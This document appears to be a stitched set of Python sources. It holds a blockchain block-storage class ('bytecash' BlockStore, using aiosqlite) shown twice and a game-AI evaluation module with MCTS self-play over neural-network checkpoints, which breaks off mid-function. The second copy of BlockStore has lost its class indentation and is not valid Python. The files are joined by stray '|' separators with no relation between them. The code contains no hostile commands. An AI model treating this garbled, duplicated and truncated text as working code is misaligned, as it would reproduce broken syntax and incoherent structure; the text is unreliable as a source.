            full_block: FullBlock = FullBlock.from_bytes(row[1])
            # TODO: address hint error and remove ignore
            #       error: Invalid index type "bytes" for "Dict[bytes32, FullBlock]"; expected type "bytes32"  [index]
            all_blocks[header_hash] = full_block  # type: ignore[index]
            self.block_cache.put(header_hash, full_block)

        # Re-establish the caller's ordering; fail loudly on any missing hash.
        ret: List[FullBlock] = []
        for hh in header_hashes:
            if hh not in all_blocks:
                raise ValueError(f"Header hash {hh} not in the blockchain")
            ret.append(all_blocks[hh])
        return ret

    async def get_block_record(self, header_hash: bytes32) -> Optional[BlockRecord]:
        """Return the block record for header_hash, or None if not stored."""
        cursor = await self.db.execute(
            "SELECT block from block_records WHERE header_hash=?",
            (header_hash.hex(),),
        )
        row = await cursor.fetchone()
        await cursor.close()
        if row is not None:
            return BlockRecord.from_bytes(row[0])
        return None

    async def get_block_records_in_range(
        self,
        start: int,
        stop: int,
    ) -> Dict[bytes32, BlockRecord]:
        """
        Returns a dictionary with all blocks in range between start and stop
        if present.
        """
        # Bind the bounds as parameters instead of interpolating them into SQL.
        cursor = await self.db.execute(
            "SELECT header_hash, block from block_records WHERE height >= ? and height <= ?",
            (start, stop),
        )
        rows = await cursor.fetchall()
        await cursor.close()
        ret: Dict[bytes32, BlockRecord] = {}
        for row in rows:
            header_hash = bytes.fromhex(row[0])
            # TODO: address hint error and remove ignore
            #       error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32"  [index]
            ret[header_hash] = BlockRecord.from_bytes(row[1])  # type: ignore[index]

        return ret

    async def get_block_records_close_to_peak(
        self, blocks_n: int
    ) -> Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]:
        """
        Returns a dictionary with all blocks that have height >= peak height - blocks_n, as well as the
        peak header hash.
        """

        res = await self.db.execute("SELECT * from block_records WHERE is_peak = 1")
        peak_row = await res.fetchone()
        await res.close()
        if peak_row is None:
            return {}, None

        # peak_row[2] is the height column; bind the bound as a parameter.
        cursor = await self.db.execute(
            "SELECT header_hash, block from block_records WHERE height >= ?",
            (peak_row[2] - blocks_n,),
        )
        rows = await cursor.fetchall()
        await cursor.close()
        ret: Dict[bytes32, BlockRecord] = {}
        for row in rows:
            header_hash = bytes.fromhex(row[0])
            # TODO: address hint error and remove ignore
            #       error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32"  [index]
            ret[header_hash] = BlockRecord.from_bytes(row[1])  # type: ignore[index]
        # TODO: address hint error and remove ignore
        #       error: Incompatible return value type (got "Tuple[Dict[bytes32, BlockRecord], bytes]", expected
        #       "Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]")  [return-value]
        return ret, bytes.fromhex(peak_row[0])  # type: ignore[return-value]

    async def set_peak(self, header_hash: bytes32) -> None:
        """Mark header_hash as the peak. Caller must commit (shared tx with coin store)."""
        # We need to be in a sqlite transaction here.
        # Note: we do not commit this to the database yet, as we need to also change the coin store
        cursor_1 = await self.db.execute("UPDATE block_records SET is_peak=0 WHERE is_peak=1")
        await cursor_1.close()
        cursor_2 = await self.db.execute(
            "UPDATE block_records SET is_peak=1 WHERE header_hash=?",
            (header_hash.hex(),),
        )
        await cursor_2.close()

    async def is_fully_compactified(self, header_hash: bytes32) -> Optional[bool]:
        """Return the compactification flag for header_hash, or None if unknown."""
        cursor = await self.db.execute(
            "SELECT is_fully_compactified from full_blocks WHERE header_hash=?", (header_hash.hex(),)
        )
        row = await cursor.fetchone()
        await cursor.close()
        if row is None:
            return None
        return bool(row[0])

    async def get_random_not_compactified(self, number: int) -> List[int]:
        """Return up to `number` random heights at which no stored block is compactified."""
        # Since orphan blocks do not get compactified, we need to check whether all blocks with a
        # certain height are not compact. And if we do have compact orphan blocks, then all that
        # happens is that the occasional chain block stays uncompact - not ideal, but harmless.
        cursor = await self.db.execute(
            "SELECT height FROM full_blocks GROUP BY height HAVING sum(is_fully_compactified)=0 "
            "ORDER BY RANDOM() LIMIT ?",
            (number,),
        )
        rows = await cursor.fetchall()
        await cursor.close()

        heights = []
        for row in rows:
            heights.append(int(row[0]))

        return heights
| import logging
from typing import Dict, List, Optional, Tuple
import aiosqlite
from bytecash.consensus.block_record import BlockRecord
from bytecash.types.blockchain_format.sized_bytes import bytes32
from bytecash.types.full_block import FullBlock
from bytecash.types.weight_proof import SubEpochChallengeSegment, SubEpochSegments
from bytecash.util.db_wrapper import DBWrapper
from bytecash.util.ints import uint32
from bytecash.util.lru_cache import LRUCache
log = logging.getLogger(__name__)
class BlockStore:
db: aiosqlite.Connection
block_cache: LRUCache
db_wrapper: DBWrapper
ses_challenge_cache: LRUCache
@classmethod
async def create(cls, db_wrapper: DBWrapper):
self = cls()
# All full blocks which have been added to the blockchain. Header_hash -> block
self.db_wrapper = db_wrapper
self.db = db_wrapper.db
await self.db.execute(
"CREATE TABLE IF NOT EXISTS full_blocks(header_hash text PRIMARY KEY, height bigint,"
" is_block tinyint, is_fully_compactified tinyint, block blob)"
)
# Block records
await self.db.execute(
"CREATE TABLE IF NOT EXISTS block_records(header_hash "
"text PRIMARY KEY, prev_hash text, height bigint,"
"block blob, sub_epoch_summary blob, is_peak tinyint, is_block tinyint)"
)
# todo remove in v1.2
await self.db.execute("DROP TABLE IF EXISTS sub_epoch_segments_v2")
# Sub epoch segments for weight proofs
await self.db.execute(
"CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(ses_block_hash text PRIMARY KEY, challenge_segments blob)"
)
# Height index so we can look up in order of height for sync purposes
await self.db.execute("CREATE INDEX IF NOT EXISTS full_block_height on full_blocks(height)")
await self.db.execute("CREATE INDEX IF NOT EXISTS is_fully_compactified on full_blocks(is_fully_compactified)")
await self.db.execute("CREATE INDEX IF NOT EXISTS height on block_records(height)")
if self.db_wrapper.allow_upgrades:
await self.db.execute("DROP INDEX IF EXISTS hh")
await self.db.execute("DROP INDEX IF EXISTS is_block")
await self.db.execute("DROP INDEX IF EXISTS peak")
await self.db.execute(
"CREATE INDEX IF NOT EXISTS is_peak_eq_1_idx on block_records(is_peak) where is_peak = 1"
)
else:
await self.db.execute("CREATE INDEX IF NOT EXISTS peak on block_records(is_peak) where is_peak = 1")
await self.db.commit()
self.block_cache = LRUCache(1000)
self.ses_challenge_cache = LRUCache(50)
return self
async def add_full_block(self, header_hash: bytes32, block: FullBlock, block_record: BlockRecord) -> None:
self.block_cache.put(header_hash, block)
cursor_1 = await self.db.execute(
"INSERT OR REPLACE INTO full_blocks VALUES(?, ?, ?, ?, ?)",
(
header_hash.hex(),
block.height,
int(block.is_transaction_block()),
int(block.is_fully_compactified()),
bytes(block),
),
)
await cursor_1.close()
cursor_2 = await self.db.execute(
"INSERT OR REPLACE INTO block_records VALUES(?, ?, ?, ?,?, ?, ?)",
(
header_hash.hex(),
block.prev_header_hash.hex(),
block.height,
bytes(block_record),
None
if block_record.sub_epoch_summary_included is None
else bytes(block_record.sub_epoch_summary_included),
False,
block.is_transaction_block(),
),
)
await cursor_2.close()
async def persist_sub_epoch_challenge_segments(
    self, ses_block_hash: bytes32, segments: List[SubEpochChallengeSegment]
) -> None:
    """Store (or overwrite) the serialized challenge segments for a sub-epoch and commit."""
    async with self.db_wrapper.lock:
        row = (ses_block_hash.hex(), bytes(SubEpochSegments(segments)))
        cursor = await self.db.execute(
            "INSERT OR REPLACE INTO sub_epoch_segments_v3 VALUES(?, ?)", row
        )
        await cursor.close()
        await self.db.commit()
async def get_sub_epoch_challenge_segments(
    self,
    ses_block_hash: bytes32,
) -> Optional[List[SubEpochChallengeSegment]]:
    """Return the challenge segments stored for ses_block_hash, or None if absent.

    Results are memoized in ses_challenge_cache.
    """
    hit = self.ses_challenge_cache.get(ses_block_hash)
    if hit is not None:
        return hit
    cursor = await self.db.execute(
        "SELECT challenge_segments from sub_epoch_segments_v3 WHERE ses_block_hash=?", (ses_block_hash.hex(),)
    )
    row = await cursor.fetchone()
    await cursor.close()
    if row is None:
        return None
    segments = SubEpochSegments.from_bytes(row[0]).challenge_segments
    self.ses_challenge_cache.put(ses_block_hash, segments)
    return segments
def rollback_cache_block(self, header_hash: bytes32):
    """Evict a block from the in-memory cache after a chain rollback (best effort)."""
    try:
        self.block_cache.remove(header_hash)
    except KeyError:
        # this is best effort. When rolling back, we may not have added the
        # block to the cache yet
        pass
async def get_full_block(self, header_hash: bytes32) -> Optional[FullBlock]:
    """Fetch a FullBlock by header hash, serving from the cache when possible."""
    hit = self.block_cache.get(header_hash)
    if hit is not None:
        log.debug(f"cache hit for block {header_hash.hex()}")
        return hit
    log.debug(f"cache miss for block {header_hash.hex()}")
    cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
    row = await cursor.fetchone()
    await cursor.close()
    if row is None:
        return None
    block = FullBlock.from_bytes(row[0])
    self.block_cache.put(header_hash, block)
    return block
async def get_full_block_bytes(self, header_hash: bytes32) -> Optional[bytes]:
    """Return the serialized block bytes for header_hash, or None if unknown.

    A cache hit is re-serialized; a DB hit returns the stored blob directly.
    """
    hit = self.block_cache.get(header_hash)
    if hit is not None:
        log.debug(f"cache hit for block {header_hash.hex()}")
        return bytes(hit)
    log.debug(f"cache miss for block {header_hash.hex()}")
    cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
    row = await cursor.fetchone()
    await cursor.close()
    return row[0] if row is not None else None
async def get_full_blocks_at(self, heights: List[uint32]) -> List[FullBlock]:
    """Return every stored block (orphans included) at each of the given heights."""
    if not heights:
        return []
    placeholders = ",".join("?" * len(heights))
    cursor = await self.db.execute(
        f"SELECT block from full_blocks WHERE height in ({placeholders})", tuple(heights)
    )
    rows = await cursor.fetchall()
    await cursor.close()
    return [FullBlock.from_bytes(row[0]) for row in rows]
async def get_block_records_by_hash(self, header_hashes: List[bytes32]):
    """
    Returns a list of Block Records, ordered by the same order in which header_hashes are passed in.
    Throws an exception if the blocks are not present
    """
    if not header_hashes:
        return []
    hex_hashes = tuple(hh.hex() for hh in header_hashes)
    placeholders = ",".join("?" * len(hex_hashes))
    cursor = await self.db.execute(
        f"SELECT block from block_records WHERE header_hash in ({placeholders})", hex_hashes
    )
    rows = await cursor.fetchall()
    await cursor.close()
    by_hash: Dict[bytes32, BlockRecord] = {}
    for row in rows:
        record: BlockRecord = BlockRecord.from_bytes(row[0])
        by_hash[record.header_hash] = record
    ordered: List[BlockRecord] = []
    for hh in header_hashes:
        if hh not in by_hash:
            raise ValueError(f"Header hash {hh} not in the blockchain")
        ordered.append(by_hash[hh])
    return ordered
async def get_blocks_by_hash(self, header_hashes: List[bytes32]) -> List[FullBlock]:
    """
    Returns a list of Full Blocks blocks, ordered by the same order in which header_hashes are passed in.
    Throws an exception if the blocks are not present
    """
    if not header_hashes:
        return []
    hex_hashes = tuple(hh.hex() for hh in header_hashes)
    placeholders = ",".join("?" * len(hex_hashes))
    cursor = await self.db.execute(
        f"SELECT header_hash, block from full_blocks WHERE header_hash in ({placeholders})", hex_hashes
    )
    rows = await cursor.fetchall()
    await cursor.close()
    by_hash: Dict[bytes32, FullBlock] = {}
    for raw_hash, raw_block in rows:
        header_hash = bytes.fromhex(raw_hash)
        block: FullBlock = FullBlock.from_bytes(raw_block)
        # TODO: address hint error and remove ignore
        # error: Invalid index type "bytes" for "Dict[bytes32, FullBlock]"; expected type "bytes32" [index]
        by_hash[header_hash] = block  # type: ignore[index]
        self.block_cache.put(header_hash, block)
    ordered: List[FullBlock] = []
    for hh in header_hashes:
        if hh not in by_hash:
            raise ValueError(f"Header hash {hh} not in the blockchain")
        ordered.append(by_hash[hh])
    return ordered
async def get_block_record(self, header_hash: bytes32) -> Optional[BlockRecord]:
    """Load a single BlockRecord by header hash, or None if not stored."""
    cursor = await self.db.execute(
        "SELECT block from block_records WHERE header_hash=?",
        (header_hash.hex(),),
    )
    row = await cursor.fetchone()
    await cursor.close()
    return BlockRecord.from_bytes(row[0]) if row is not None else None
async def get_block_records_in_range(
    self,
    start: int,
    stop: int,
) -> Dict[bytes32, BlockRecord]:
    """
    Returns a dictionary with all blocks in range between start and stop
    if present.
    """
    # Fix: bind start/stop as parameters instead of interpolating them into
    # the SQL text with an f-string (avoids injection-prone string building
    # and lets sqlite reuse the prepared statement).
    cursor = await self.db.execute(
        "SELECT header_hash, block from block_records WHERE height >= ? and height <= ?",
        (start, stop),
    )
    rows = await cursor.fetchall()
    await cursor.close()
    ret: Dict[bytes32, BlockRecord] = {}
    for row in rows:
        header_hash = bytes.fromhex(row[0])
        # TODO: address hint error and remove ignore
        # error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32" [index]
        ret[header_hash] = BlockRecord.from_bytes(row[1])  # type: ignore[index]
    return ret
async def get_block_records_close_to_peak(
    self, blocks_n: int
) -> Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]:
    """
    Returns a dictionary with all blocks that have height >= peak height - blocks_n, as well as the
    peak header hash. Returns ({}, None) when no peak has been set.
    """
    res = await self.db.execute("SELECT * from block_records WHERE is_peak = 1")
    peak_row = await res.fetchone()
    await res.close()
    if peak_row is None:
        return {}, None
    # Fix: bind the height cutoff as a parameter instead of building the SQL
    # text with an f-string.
    cursor = await self.db.execute(
        "SELECT header_hash, block from block_records WHERE height >= ?",
        (peak_row[2] - blocks_n,),
    )
    rows = await cursor.fetchall()
    await cursor.close()
    ret: Dict[bytes32, BlockRecord] = {}
    for row in rows:
        header_hash = bytes.fromhex(row[0])
        # TODO: address hint error and remove ignore
        # error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32" [index]
        ret[header_hash] = BlockRecord.from_bytes(row[1])  # type: ignore[index]
    # TODO: address hint error and remove ignore
    # error: Incompatible return value type (got "Tuple[Dict[bytes32, BlockRecord], bytes]", expected
    # "Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]") [return-value]
    return ret, bytes.fromhex(peak_row[0])  # type: ignore[return-value]
async def set_peak(self, header_hash: bytes32) -> None:
    """Mark header_hash as the unique peak in block_records.

    Must be called inside an open sqlite transaction; nothing is committed
    here because the coin store is updated in the same transaction.
    """
    clear_cursor = await self.db.execute("UPDATE block_records SET is_peak=0 WHERE is_peak=1")
    await clear_cursor.close()
    mark_cursor = await self.db.execute(
        "UPDATE block_records SET is_peak=1 WHERE header_hash=?",
        (header_hash.hex(),),
    )
    await mark_cursor.close()
async def is_fully_compactified(self, header_hash: bytes32) -> Optional[bool]:
    """Return whether the stored block is fully compactified; None when the block is unknown."""
    cursor = await self.db.execute(
        "SELECT is_fully_compactified from full_blocks WHERE header_hash=?", (header_hash.hex(),)
    )
    row = await cursor.fetchone()
    await cursor.close()
    return None if row is None else bool(row[0])
async def get_random_not_compactified(self, number: int) -> List[int]:
    """Return up to `number` random heights at which no stored block is fully compactified.

    Since orphan blocks do not get compactified, we need to check whether all blocks with a
    certain height are not compact. And if we do have compact orphan blocks, then all that
    happens is that the occasional chain block stays uncompact - not ideal, but harmless.
    """
    # Fix: pass LIMIT as a bound parameter rather than interpolating it into
    # the SQL text with an f-string.
    cursor = await self.db.execute(
        "SELECT height FROM full_blocks GROUP BY height HAVING sum(is_fully_compactified)=0 "
        "ORDER BY RANDOM() LIMIT ?",
        (number,),
    )
    rows = await cursor.fetchall()
    await cursor.close()
    return [int(row[0]) for row in rows]
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from typing import Iterator, Tuple, List, Callable, Optional, Dict
import torch
import tube
from pytube.data_channel_manager import DataChannelManager
from .params import GameParams, EvalParams, ExecutionParams
from . import utils
from .env_creation_helpers import (
sanitize_game_params,
create_model,
create_game,
create_player,
)
#######################################################################################
# PLOTTER CREATION
#######################################################################################
def create_plotter(eval_params: EvalParams) -> utils.Plotter:
    """Build a Plotter whose plot environment is named after the checkpoint directory."""
    directory = eval_params.checkpoint_dir
    # Drop a single trailing slash so basename() yields the directory name.
    if directory[-1] == "/":
        directory = directory[:-1]
    return utils.Plotter(
        plot_enabled=eval_params.plot_enabled,
        env=os.path.basename(directory),
        server=eval_params.plot_server,
        port=eval_params.plot_port,
    )
#######################################################################################
# CHECKPOINT ITERATOR CREATION
#######################################################################################
def create_checkpoint_iter(eval_params: EvalParams, only_last: bool = False):
    """Return the checkpoints to evaluate.

    With a checkpoint directory, stream checkpoints from it (optionally only
    the last one, and without waiting for new ones when only_last is set);
    otherwise load the single explicit checkpoint.
    """
    if eval_params.checkpoint_dir is None:
        return [utils.load_checkpoint(eval_params.checkpoint)]
    return utils.gen_checkpoints(
        checkpoint_dir=eval_params.checkpoint_dir,
        real_time=eval_params.real_time and not only_last,
        only_last=only_last,
    )
#######################################################################################
# OPPONENT MODEL AND DEVICE CREATION
#######################################################################################
def create_models_and_devices_opponent(
    eval_params: EvalParams
) -> Tuple[List[torch.jit.ScriptModule], List[torch.device], GameParams]:
    """Load the opponent checkpoint and build one eval-mode model per opponent device.

    Returns (models, devices, game_params) for the opponent side.
    """
    devices = [torch.device(name) for name in eval_params.device_opponent]
    checkpoint = utils.load_checkpoint(eval_params.checkpoint_opponent)
    state_dict = checkpoint["model_state_dict"]
    game_params = checkpoint["game_params"]
    sanitize_game_params(game_params)
    model_params = checkpoint["model_params"]
    models = []
    for device in devices:
        model = create_model(
            game_params=game_params,
            model_params=model_params,
            resume_training=False,
        ).to(device)
        # Drop training-only entries so the state dict matches the eval model.
        # (The dict is shared across iterations, so this is a no-op after the
        # first device — same as the original behavior.)
        for key in [k for k in state_dict if "training" in k]:
            state_dict.pop(key)
        model.load_state_dict(state_dict)
        model.eval()
        models.append(model)
    return models, devices, game_params
#######################################################################################
# EVALUATION ENVIRONMENT CREATION
#######################################################################################
def create_evaluation_environment(
    seed_generator: Iterator[int],
    game_params: GameParams,
    eval_params: EvalParams,
    current_batch_size: int = None,
    pure_mcts_eval: bool = False,
    pure_mcts_opponent: bool = True,
    num_evaluated_games: int = 0
) -> Tuple[
    tube.Context,
    Optional[tube.DataChannel],
    Optional[tube.DataChannel],
    Callable[[], List[int]],
]:
    """Create one batch of evaluation games plus the channels that drive them.

    Returns the tube context holding the game threads, the eval and opponent
    actor channels (None for a pure-MCTS side, which needs no NN inference),
    and a zero-argument callable that collects the evaluated player's reward
    from every game once the context has terminated.
    """
    num_game = eval_params.num_game_eval
    num_actor_eval = eval_params.num_actor_eval
    num_rollouts_eval = eval_params.num_rollouts_eval
    num_actor_opponent = eval_params.num_actor_opponent
    num_rollouts_opponent = eval_params.num_rollouts_opponent
    # Games where the evaluated player moves first vs. second; its reward sits
    # at result index 0 or 1 respectively (see get_eval_reward below).
    first_hand = []
    second_hand = []
    games = []
    context = tube.Context()
    # A data channel is only needed when the corresponding side is NN-powered.
    actor_channel_eval = (
        None
        if pure_mcts_eval
        else tube.DataChannel("act_eval", num_game * num_actor_eval, 1)
    )
    actor_channel_opponent = (
        None
        if pure_mcts_opponent
        else tube.DataChannel("act_opponent", num_game * num_actor_opponent, 1)
    )
    for game_no in range(current_batch_size if current_batch_size else num_game):
        game = create_game(
            game_params, num_episode=1, seed=next(seed_generator), eval_mode=True
        )
        player = create_player(
            seed_generator=seed_generator,
            game=game,
            player="mcts",
            num_actor=num_actor_eval,
            num_rollouts=num_rollouts_eval,
            pure_mcts=pure_mcts_eval,
            actor_channel=actor_channel_eval,
            model_manager=None,
            human_mode=False,
            sample_before_step_idx=8,
            randomized_rollouts=False,
            sampling_mcts=False,
        )
        if game.is_one_player_game():
            game.add_eval_player(player)
            first_hand.append(game)
        else:
            opponent = create_player(
                seed_generator=seed_generator,
                game=game,
                player="mcts",
                num_actor=num_actor_opponent,
                num_rollouts=num_rollouts_opponent,
                pure_mcts=pure_mcts_opponent,
                actor_channel=actor_channel_opponent,
                model_manager=None,
                human_mode=False,
                sample_before_step_idx=8,
                randomized_rollouts=False,
                sampling_mcts=False,
            )
            # Alternate seats over the whole evaluation (not just this batch)
            # so the result is not biased by who moves first.
            game_id = num_evaluated_games + game_no
            if player_moves_first(game_id, num_game):
                game.add_eval_player(player)
                game.add_eval_player(opponent)
                first_hand.append(game)
            else:
                game.add_eval_player(opponent)
                game.add_eval_player(player)
                second_hand.append(game)
        context.push_env_thread(game)
        games.append(game)

    def get_eval_reward():
        # Pick the evaluated player's reward: seat 0 when it moved first,
        # seat 1 when it moved second.
        nonlocal first_hand, second_hand
        reward = []
        for hand in first_hand:
            reward.append(hand.get_result()[0])
        for hand in second_hand:
            reward.append(hand.get_result()[1])
        return reward

    return context, actor_channel_eval, actor_channel_opponent, get_eval_reward
def player_moves_first(game_id, num_games_eval):
    """The evaluated player opens the first half of the games; the opponent opens the rest."""
    half = num_games_eval // 2
    return game_id < half
#######################################################################################
# EVALUATION
#######################################################################################
def _forward_pass_on_device(
    device: torch.device, model: torch.jit.ScriptModule, batch_s: torch.Tensor
) -> Dict[str, torch.Tensor]:
    """Move batch_s to device and run one gradient-free forward pass of model."""
    inputs = utils.to_device(batch_s, device)
    with torch.no_grad():
        return model(inputs)
def _play_game_neural_mcts_against_pure_mcts_opponent(
    context: tube.Context,
    actor_channel_eval: tube.DataChannel,
    devices_eval: List[torch.device],
    models_eval: List[torch.jit.ScriptModule],
) -> None:
    """Serve NN inference for the evaluated player until every game finishes.

    The pure-MCTS opponent needs no network, so only the eval channel is
    polled. Each incoming batch of states is chunked across the eval devices,
    evaluated in parallel threads, and the concatenated (v, pi_logit) reply is
    sent back on the channel.
    """
    nb_devices_eval = len(devices_eval)
    context.start()
    dcm = DataChannelManager([actor_channel_eval])
    while not context.terminated():
        # Poll with a timeout so loop termination is re-checked regularly.
        batch = dcm.get_input(max_timeout_s=1)
        if len(batch) == 0:
            continue
        assert len(batch) == 1  # only one channel
        # split in as many part as there are devices
        batches_eval_s = torch.chunk(
            batch[actor_channel_eval.name]["s"], nb_devices_eval, dim=0
        )
        futures = []
        reply_eval = {"v": None, "pi_logit": None}
        # multithread
        with ThreadPoolExecutor(max_workers=nb_devices_eval) as executor:
            for device, model, batch_s in zip(
                devices_eval, models_eval, batches_eval_s
            ):
                futures.append(
                    executor.submit(_forward_pass_on_device, device, model, batch_s)
                )
        # Reassemble per-device outputs in submission order so rows line up
        # with the original batch.
        results = [future.result() for future in futures]
        reply_eval["v"] = torch.cat([result["v"] for result in results], dim=0)
        reply_eval["pi_logit"] = torch.cat([result["pi_logit"] for result in results], dim=0)
        dcm.set_reply(actor_channel_eval.name, reply_eval)
    dcm.terminate()
def _multi_device_reply(
    batch_s: torch.Tensor,
    devices: List[torch.device],
    models: List[torch.jit.ScriptModule],
) -> Dict[str, torch.Tensor]:
    """Chunk a state batch across devices, run the forward passes in parallel
    threads, and concatenate the per-device outputs back into one reply dict."""
    chunks = torch.chunk(batch_s, len(devices), dim=0)
    with ThreadPoolExecutor(max_workers=len(devices)) as executor:
        futures = [
            executor.submit(_forward_pass_on_device, device, model, chunk)
            for device, model, chunk in zip(devices, models, chunks)
        ]
    # Results are collected in submission order so rows line up with batch_s.
    results = [future.result() for future in futures]
    return {
        "v": torch.cat([result["v"] for result in results], dim=0),
        "pi_logit": torch.cat([result["pi_logit"] for result in results], dim=0),
    }


def _play_game_neural_mcts_against_neural_mcts_opponent(
    context: tube.Context,
    actor_channel_eval: tube.DataChannel,
    actor_channel_opponent: tube.DataChannel,
    devices_eval: List[torch.device],
    models_eval: List[torch.jit.ScriptModule],
    devices_opponent: List[torch.device],
    models_opponent: List[torch.jit.ScriptModule],
) -> None:
    """Serve NN inference for both sides until every game finishes.

    Each polled batch may contain requests from the eval channel, the
    opponent channel, or both; each is answered with the matching models.
    (Refactored: the two previously duplicated per-channel branches now share
    _multi_device_reply.)
    """
    context.start()
    dcm = DataChannelManager([actor_channel_eval, actor_channel_opponent])
    while not context.terminated():
        # Poll with a timeout so loop termination is re-checked regularly.
        batch = dcm.get_input(max_timeout_s=1)
        if len(batch) == 0:
            continue
        assert len(batch) <= 2  # up to two channels
        if actor_channel_eval.name in batch:
            reply_eval = _multi_device_reply(
                batch[actor_channel_eval.name]["s"], devices_eval, models_eval
            )
            dcm.set_reply(actor_channel_eval.name, reply_eval)
        if actor_channel_opponent.name in batch:
            reply_opponent = _multi_device_reply(
                batch[actor_channel_opponent.name]["s"], devices_opponent, models_opponent
            )
            dcm.set_reply(actor_channel_opponent.name, reply_opponent)
    dcm.terminate()
def evaluate_on_checkpoint(
    game_params: GameParams,
    eval_params: EvalParams,
    context: tube.Context,
    actor_channel_eval: Optional[tube.DataChannel],
    actor_channel_opponent: Optional[tube.DataChannel],
    get_eval_reward: Callable[[], List[int]],
    devices_eval: Optional[List[torch.device]],
    models_eval: Optional[List[torch.jit.ScriptModule]],
    pure_mcts_eval: bool,
    devices_opponent: Optional[List[torch.device]],
    models_opponent: Optional[List[torch.jit.ScriptModule]],
    pure_mcts_opponent: bool,
) -> utils.Result:
    """Play the already-created batch of games to completion and return the Result.

    Dispatches to the inference loop matching the opponent type (pure MCTS or
    NN-powered). Pure-MCTS evaluation of the tested player itself is a no-op
    (not implemented).
    """
    if eval_params.eval_verbosity:
        # Fix: the original nested double quotes inside double-quoted
        # f-strings ({"pure MCTS" if ...}), a SyntaxError before Python 3.12.
        # Hoist the conditional parts into locals instead.
        eval_name = "pure MCTS" if pure_mcts_eval else type(models_eval[0]).__name__
        opponent_name = (
            "pure MCTS" if pure_mcts_opponent else type(models_opponent[0]).__name__
        )
        eval_plural = "s" if eval_params.num_actor_eval > 1 else ""
        opponent_plural = "s" if eval_params.num_actor_opponent > 1 else ""
        print(f"Playing {eval_params.num_game_eval} games of {game_params.game_name}:")
        print(
            f"- {eval_name} "
            f"player uses "
            f"{eval_params.num_rollouts_eval} rollouts per actor "
            f"with {eval_params.num_actor_eval} "
            f"actor{eval_plural}"
        )
        print(
            f"- {opponent_name} "
            f"opponent uses "
            f"{eval_params.num_rollouts_opponent} rollouts per actor "
            f"with {eval_params.num_actor_opponent} "
            f"actor{opponent_plural}"
        )
    if pure_mcts_eval:
        pass  # not implemented
    else:
        if pure_mcts_opponent:
            _play_game_neural_mcts_against_pure_mcts_opponent(
                context=context,
                actor_channel_eval=actor_channel_eval,
                devices_eval=devices_eval,
                models_eval=models_eval,
            )
        else:
            _play_game_neural_mcts_against_neural_mcts_opponent(
                context=context,
                actor_channel_eval=actor_channel_eval,
                actor_channel_opponent=actor_channel_opponent,
                devices_eval=devices_eval,
                models_eval=models_eval,
                devices_opponent=devices_opponent,
                models_opponent=models_opponent,
            )
    result = utils.Result(get_eval_reward())
    if eval_params.eval_verbosity >= 2:
        print("@@@eval: %s" % result.log())
    return result
#######################################################################################
# OVERALL EVALUATION WORKFLOW
#######################################################################################
def run_evaluation(eval_params: EvalParams, execution_params: ExecutionParams, only_last: bool = False) -> None:
    """Top-level evaluation workflow.

    For each checkpoint found (a directory stream or a single file), loads the
    eval model(s), plays num_game_eval games in batches against the configured
    opponent (pure MCTS unless an opponent checkpoint is given), aggregates the
    rewards, and optionally plots the per-epoch results.
    """
    start_time = time.time()
    # Log next to the checkpoints; all print() output is tee'd to eval.log.
    logger_dir = eval_params.checkpoint_dir
    if eval_params.checkpoint_dir is None:
        logger_dir = os.path.dirname(eval_params.checkpoint)
    logger_path = os.path.join(logger_dir, "eval.log")
    sys.stdout = utils.Logger(logger_path)
    print("#" * 70)
    print("#" + "EVALUATION".center(68) + "#")
    print("#" * 70)
    # evaluation is done on a NN-powered MCTS
    pure_mcts_eval = False
    print("setting-up pseudo-random generator...")
    seed_generator = utils.generate_random_seeds(seed=eval_params.seed_eval)
    if eval_params.plot_enabled:
        print("creating plotter...")
        plotter = create_plotter(eval_params=eval_params)
    print("finding checkpoints...")
    checkpoint_iter = create_checkpoint_iter(
        eval_params=eval_params, only_last=only_last
    )
    # Opponent side: pure MCTS by default, NN-powered when a checkpoint is given.
    models_opponent = []
    pure_mcts_opponent = True
    devices_opponent = None
    game_params_opponent = None
    if eval_params.checkpoint_opponent is not None:
        print("creating opponent model(s) and device(s)...")
        pure_mcts_opponent = False
        (
            models_opponent,
            devices_opponent,
            game_params_opponent,
        ) = create_models_and_devices_opponent(eval_params=eval_params)
    results = []
    # Flag: eval models/devices are created once, on the first checkpoint.
    first_checkpoint = False
    game_params = None
    for checkpoint in checkpoint_iter:
        epoch = checkpoint.get("epoch", 0)  # 0 when checkpoint_dir is None
        model_state_dict_eval = checkpoint["model_state_dict"]
        model_params_eval = checkpoint["model_params"]
        if game_params is None:
            game_params = checkpoint["game_params"]
            sanitize_game_params(game_params)
            # check that game_params are consistent between the model_eval and
            # the model_opponent
            if game_params_opponent is not None and game_params != game_params_opponent:
                # Fix: the implicit string concatenation was missing a space
                # ("...to be testedand the opponent...").
                raise ValueError(
                    "The game parameters between the model to be tested "
                    "and the opponent model are different"
                )
        # check that game_params are consistent from one epoch to the other
        checkpoint_game_params = checkpoint["game_params"]
        sanitize_game_params(checkpoint_game_params)
        if game_params != checkpoint_game_params:
            raise ValueError(f"The game parameters have changed at checkpoint #{epoch}")
        if not first_checkpoint:
            print("creating model(s) and device(s)...")
            devices_eval = [
                torch.device(device_eval) for device_eval in eval_params.device_eval
            ]
            models_eval = []
            for device_eval in devices_eval:
                models_eval.append(
                    create_model(
                        game_params=game_params,
                        model_params=model_params_eval,
                        resume_training=False,
                    ).to(device_eval)
                )
            first_checkpoint = True
        # Refresh every per-device model with this checkpoint's weights.
        print("updating model(s)...")
        for model_eval in models_eval:
            model_eval.load_state_dict(model_state_dict_eval)
            model_eval.eval()
        num_evaluated_games = 0
        rewards = []
        # Play games in batches to bound the number of concurrent game threads.
